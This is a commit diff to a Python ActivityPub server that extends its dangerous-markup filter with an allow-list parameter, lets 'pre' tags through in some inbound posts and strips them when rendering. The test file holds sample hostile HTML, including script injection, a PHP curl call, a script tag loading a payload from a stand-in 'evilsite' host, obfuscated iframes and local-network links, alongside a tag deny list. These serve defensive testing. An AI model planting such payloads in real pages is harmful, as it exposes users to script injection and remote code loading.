Allow pre tag through dangerous markup filter in some cases, then remove it when rendering

2023-05-18 12:15:18 +01:00 · 2023-05-18 12:15:18 +01:00 · 4caa930f67
parent 8efb5bedd4
commit 4caa930f67
11 changed files with 115 additions and 38 deletions
--- a/content.py
+++ b/content.py
@ -267,7 +267,7 @@ def dangerous_css(filename: str, allow_local_network_access: bool) -> bool:

    # an attacker can include html inside of the css
    # file as a comment and this may then be run from the html
-    if dangerous_markup(content, allow_local_network_access):
+    if dangerous_markup(content, allow_local_network_access, []):
        return True
    return False

--- a/daemon.py
+++ b/daemon.py
@ -5544,7 +5544,7 @@ class PubServer(BaseHTTPRequestHandler):
                if fields.get('editedAbout'):
                    about_str = fields['editedAbout']
                    if not dangerous_markup(about_str,
-                                            allow_local_network_access):
+                                            allow_local_network_access, []):
                        try:
                            with open(about_filename, 'w+',
                                      encoding='utf-8') as aboutfile:
@ -5563,7 +5563,7 @@ class PubServer(BaseHTTPRequestHandler):
                if fields.get('editedTOS'):
                    tos_str = fields['editedTOS']
                    if not dangerous_markup(tos_str,
-                                            allow_local_network_access):
+                                            allow_local_network_access, []):
                        try:
                            with open(tos_filename, 'w+',
                                      encoding='utf-8') as tosfile:
--- a/inbox.py
+++ b/inbox.py
@ -1360,7 +1360,7 @@ def _valid_post_content(base_dir: str, nickname: str, domain: str,
        if summary != valid_content_warning(summary):
            print('WARN: invalid content warning ' + summary)
            return False
-        if dangerous_markup(summary, allow_local_network_access):
+        if dangerous_markup(summary, allow_local_network_access, []):
            if message_json['object'].get('id'):
                print('REJECT ARBITRARY HTML: ' + message_json['object']['id'])
            print('REJECT ARBITRARY HTML: bad string in summary - ' +
@ -1384,7 +1384,7 @@ def _valid_post_content(base_dir: str, nickname: str, domain: str,
            return False

    content_str = get_base_content_from_post(message_json, system_language)
-    if dangerous_markup(content_str, allow_local_network_access):
+    if dangerous_markup(content_str, allow_local_network_access, ['pre']):
        if message_json['object'].get('id'):
            print('REJECT ARBITRARY HTML: ' + message_json['object']['id'])
        if debug:
--- a/newsdaemon.py
+++ b/newsdaemon.py
@ -601,8 +601,8 @@ def _convert_rss_to_activitypub(base_dir: str, http_prefix: str,

        rss_title = _remove_control_characters(item[0])
        url = item[1]
-        if dangerous_markup(url, allow_local_network_access) or \
-           dangerous_markup(rss_title, allow_local_network_access):
+        if dangerous_markup(url, allow_local_network_access, []) or \
+           dangerous_markup(rss_title, allow_local_network_access, []):
            continue
        rss_description = ''

--- a/outbox.py
+++ b/outbox.py
@ -303,7 +303,7 @@ def post_message_to_outbox(session, translate: {},
                                system_language, translate,
                                'nowplaying', 'NowPlaying')

-            if dangerous_markup(content_str, allow_local_network_access):
+            if dangerous_markup(content_str, allow_local_network_access, []):
                print('POST to outbox contains dangerous markup: ' +
                      str(message_json))
                return False
--- a/posts.py
+++ b/posts.py
@ -413,7 +413,7 @@ def get_person_box(signing_priv_key_pem: str, origin_domain: str,
    display_name = None
    if person_json.get('name'):
        display_name = person_json['name']
-        if dangerous_markup(person_json['name'], False):
+        if dangerous_markup(person_json['name'], False, []):
            display_name = '*ADVERSARY*'
        elif is_filtered(base_dir,
                         nickname, domain,
@ -5549,7 +5549,7 @@ def download_announce(session, base_dir: str, http_prefix: str,
            if announced_json['contentMap'].get(system_language):
                content_str = announced_json['contentMap'][system_language]
                using_content_map = True
-        if dangerous_markup(content_str, allow_local_network_access):
+        if dangerous_markup(content_str, allow_local_network_access, []):
            print('WARN: announced post contains dangerous markup ' +
                  str(announced_json))
            _reject_announce(announce_filename,
--- a/question.py
+++ b/question.py
@ -229,6 +229,7 @@ def dangerous_question(question_json: {},
        question_options = question_json['object']['oneOf']
    for option in question_options:
        if option.get('name'):
-            if dangerous_markup(option['name'], allow_local_network_access):
+            if dangerous_markup(option['name'],
+                                allow_local_network_access, []):
                return True
    return False
--- a/tests.py
+++ b/tests.py
@ -55,6 +55,7 @@ from follow import clear_followers
 from follow import send_follow_request_via_server
 from follow import send_unfollow_request_via_server
 from siteactive import site_is_active
+from utils import remove_markup_tag
 from utils import remove_style_within_html
 from utils import html_tag_has_closing
 from utils import remove_inverted_text
@ -4189,75 +4190,75 @@ def _test_danger_markup():
    print('test_dangerous_markup')
    allow_local_network_access = False
    content = '<p>This is a valid message</p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = 'This is a valid message without markup'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But wait... ' + \
        '<script>document.getElementById("concentrated")' + \
        '.innerHTML = "evil";</script></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But wait... ' + \
        '&lt;script&gt;document.getElementById("concentrated")' + \
        '.innerHTML = "evil";&lt;/script&gt;</p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This html contains more than you expected... ' + \
        '<script language="javascript">document.getElementById("abc")' + \
        '.innerHTML = "def";</script></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This html contains more than you expected... ' + \
        '<?php $server_output = curl_exec($ch); ?></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But wait... ' + \
        '<script src="https://evilsite/payload.js" /></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But it contains ' + \
        'spyware. <amp-analytics type="gtag" ' + \
        'data-credentials="include"></amp-analytics></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This is a valid-looking message. But it contains ' + \
        '<a href="something.googleapis.com/anotherthing">spyware.</a></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message embeds an evil frame.' + \
        '<iframe src="somesite"></iframe></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message tries to obfuscate an evil frame.' + \
        '<  iframe     src = "somesite"></    iframe  ></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message is not necessarily evil, but annoying.' + \
        '<hr><br><br><br><br><br><br><br><hr><hr></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message contans a ' + \
        '<a href="https://validsite/index.html">valid link.</a></p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message contans a ' + \
        '<a href="https://validsite/iframe.html">' + \
        'valid link having invalid but harmless name.</a></p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message which <a href="127.0.0.1:8736">' + \
        'tries to access the local network</a></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>This message which <a href="http://192.168.5.10:7235">' + \
        'tries to access the local network</a></p>'
-    assert dangerous_markup(content, allow_local_network_access)
+    assert dangerous_markup(content, allow_local_network_access, [])

    content = '<p>127.0.0.1 This message which does not access ' + \
        'the local network</a></p>'
-    assert not dangerous_markup(content, allow_local_network_access)
+    assert not dangerous_markup(content, allow_local_network_access, [])


 def _run_html_replace_quote_marks():
@ -7983,6 +7984,35 @@ def _test_featured_tags() -> None:
    assert result == featured_tags


+def _test_remove_tag() -> None:
+    """Tests that remove_markup_tag strips pre tags but keeps their text
+    """
+    print('remove_tag')
+    tag_name = 'pre'
+
+    # markup without the tag should be returned unchanged
+    plain_text = 'This is a test'
+    assert remove_markup_tag(plain_text, tag_name) == plain_text
+
+    # each case is the markup followed by the expected text after removal
+    test_cases = (
+        ('<pre>This is a test</pre>',
+         'This is a test'),
+        ('Previous <pre>this is a test</pre>',
+         'Previous this is a test'),
+        ('<pre>This is a test</pre><br>' +
+         'something<br><pre>again</pre>',
+         'This is a test<br>something<br>again')
+    )
+    for markup, expected in test_cases:
+        stripped = remove_markup_tag(markup, tag_name)
+        if stripped != expected:
+            # show the difference before the assertion fails
+            print('expected: ' + expected)
+            print('result: ' + stripped)
+        assert stripped == expected
+
+
 def run_all_tests():
    base_dir = os.getcwd()
    print('Running tests...')
@ -8000,6 +8030,7 @@ def run_all_tests():
    _test_checkbox_names()
    _test_thread_functions()
    _test_functions()
+    _test_remove_tag()
    _test_featured_tags()
    _test_xor_hashes()
    _test_convert_markdown()
--- a/utils.py
+++ b/utils.py
@ -192,6 +192,38 @@ def has_object_dict(post_json_object: {}) -> bool:
    return False


+def remove_markup_tag(html: str, tag: str) -> str:
+    """Remove the given tag from the given html markup
+    Opening and closing tags, together with any attributes, are
+    removed and the text between them is kept. Tags which only begin
+    with the same letters (eg. <preview> when removing pre) and tags
+    having no closing bracket are left unchanged
+    """
+    if '<' + tag not in html:
+        return html
+
+    # remove the opening tags first, then the closing tags. Splitting on
+    # the opening form never matches a closing tag, because of its slash
+    for tag_start in ('<' + tag, '</' + tag):
+        sections = html.split(tag_start)
+        # whatever comes before the first match is always kept
+        result = sections[0]
+        for text in sections[1:]:
+            # the tag name must end here, otherwise this is another tag
+            next_char = text[:1]
+            is_tag = next_char in ('>', '/') or next_char.isspace()
+            if is_tag and '>' in text:
+                # drop the remainder of the tag, up to its bracket
+                result += text.split('>', 1)[1]
+            else:
+                # not the tag being removed, or it is unterminated, so
+                # restore it rather than raising IndexError
+                result += tag_start + text
+        html = result
+
+    return html
+
+
 def get_content_from_post(post_json_object: {}, system_language: str,
                          languages_understood: [],
                          content_type: str = "content") -> str:
@ -213,6 +245,7 @@ def get_content_from_post(post_json_object: {}, system_language: str,
                sys_lang = this_post_json[map_dict][system_language]
                if isinstance(sys_lang, str):
                    content = this_post_json[map_dict][system_language]
+                    content = remove_markup_tag(content, 'pre')
                    return standardize_text(content)
            else:
                # is there a contentMap/summaryMap entry for one of
@ -220,10 +253,12 @@ def get_content_from_post(post_json_object: {}, system_language: str,
                for lang in languages_understood:
                    if this_post_json[map_dict].get(lang):
                        content = this_post_json[map_dict][lang]
+                        content = remove_markup_tag(content, 'pre')
                        return standardize_text(content)
    else:
        if isinstance(this_post_json[content_type], str):
            content = this_post_json[content_type]
+            content = remove_markup_tag(content, 'pre')
    return standardize_text(content)


@ -1182,7 +1217,8 @@ def html_tag_has_closing(tag_name: str, content: str) -> bool:
    return True


-def dangerous_markup(content: str, allow_local_network_access: bool) -> bool:
+def dangerous_markup(content: str, allow_local_network_access: bool,
+                     allow_tags: []) -> bool:
    """Returns true if the given content contains dangerous html markup
    """
    separators = [['<', '>'], ['&lt;', '&gt;']]
@ -1198,8 +1234,11 @@ def dangerous_markup(content: str, allow_local_network_access: bool) -> bool:
    invalid_strings = [
        'script', 'noscript', 'canvas', 'style', 'abbr', 'input',
        'frame', 'iframe', 'html', 'body', 'hr', 'allow-popups',
-        'allow-scripts', 'amp-', '?php'
+        'allow-scripts', 'amp-', '?php', 'pre'
    ]
+    for allowed in allow_tags:
+        if allowed in invalid_strings:
+            invalid_strings.remove(allowed)
    return _is_dangerous_string_tag(content, allow_local_network_access,
                                    separators, invalid_strings)

@ -1236,7 +1275,7 @@ def get_display_name(base_dir: str, actor: str, person_cache: {}) -> str:
                if actor_json.get('name'):
                    name_found = actor_json['name']
    if name_found:
-        if dangerous_markup(name_found, False):
+        if dangerous_markup(name_found, False, []):
            name_found = "*ADVERSARY*"
    return standardize_text(name_found)

@ -4333,19 +4372,25 @@ def harmless_markup(post_json_object: {}) -> None:
    for field_name in ('content', 'summary'):
        if post_json_object['object'].get(field_name):
            if dangerous_markup(post_json_object['object'][field_name],
-                                False):
+                                False, ['pre']):
                post_json_object['object'][field_name] = \
                    remove_html(post_json_object['object'][field_name])
+            post_json_object['object'][field_name] = \
+                remove_markup_tag(post_json_object['object'][field_name],
+                                  'pre')
        map_name = field_name + 'Map'
        if post_json_object['object'].get(map_name):
            map_dict = post_json_object['object'][map_name].items()
            for lang, content in map_dict:
                if not isinstance(content, str):
                    continue
-                if dangerous_markup(content, False):
+                if dangerous_markup(content, False, ['pre']):
                    content = remove_html(content)
                    post_json_object['object'][map_name][lang] = \
                        content
+                content = post_json_object['object'][map_name][lang]
+                post_json_object['object'][map_name][lang] = \
+                    remove_markup_tag(content, 'pre')


 def ap_proxy_type(json_object: {}) -> str:
--- a/webapp_timeline.py
+++ b/webapp_timeline.py
@ -92,7 +92,7 @@ def _get_help_for_timeline(base_dir: str, box_name: str) -> str:
            instance_title = 'Epicyon'
        with open(help_filename, 'r', encoding='utf-8') as help_file:
            help_text = help_file.read()
-            if dangerous_markup(help_text, False):
+            if dangerous_markup(help_text, False, []):
                return ''
            help_text = help_text.replace('INSTANCE', instance_title)
            return '<div class="container">\n' + \
--- a/webapp_utils.py
+++ b/webapp_utils.py
@ -1269,7 +1269,7 @@ def get_post_attachments_as_html(base_dir: str,
            continue
        media_license = ''
        if attach.get('schema:license'):
-            if not dangerous_markup(attach['schema:license'], False):
+            if not dangerous_markup(attach['schema:license'], False, []):
                if not is_filtered(base_dir, nickname, domain,
                                   attach['schema:license'],
                                   system_language):
@ -1279,7 +1279,7 @@ def get_post_attachments_as_html(base_dir: str,
                    else:
                        media_license = attach['schema:license']
        elif attach.get('license'):
-            if not dangerous_markup(attach['license'], False):
+            if not dangerous_markup(attach['license'], False, []):
                if not is_filtered(base_dir, nickname, domain,
                                   attach['license'],
                                   system_language):
@ -1291,7 +1291,7 @@ def get_post_attachments_as_html(base_dir: str,
        media_creator = ''
        if attach.get('schema:creator'):
            if len(attach['schema:creator']) < 120:
-                if not dangerous_markup(attach['schema:creator'], False):
+                if not dangerous_markup(attach['schema:creator'], False, []):
                    if not is_filtered(base_dir, nickname, domain,
                                       attach['schema:creator'],
                                       system_language):
@ -1300,7 +1300,7 @@ def get_post_attachments_as_html(base_dir: str,
            if isinstance(attach['attribution'], list):
                if len(attach['attribution']) > 0:
                    attrib_str = attach['attribution'][0]
-                    if not dangerous_markup(attrib_str, False):
+                    if not dangerous_markup(attrib_str, False, []):
                        if not is_filtered(base_dir, nickname, domain,
                                           attrib_str, system_language):
                            media_creator = attrib_str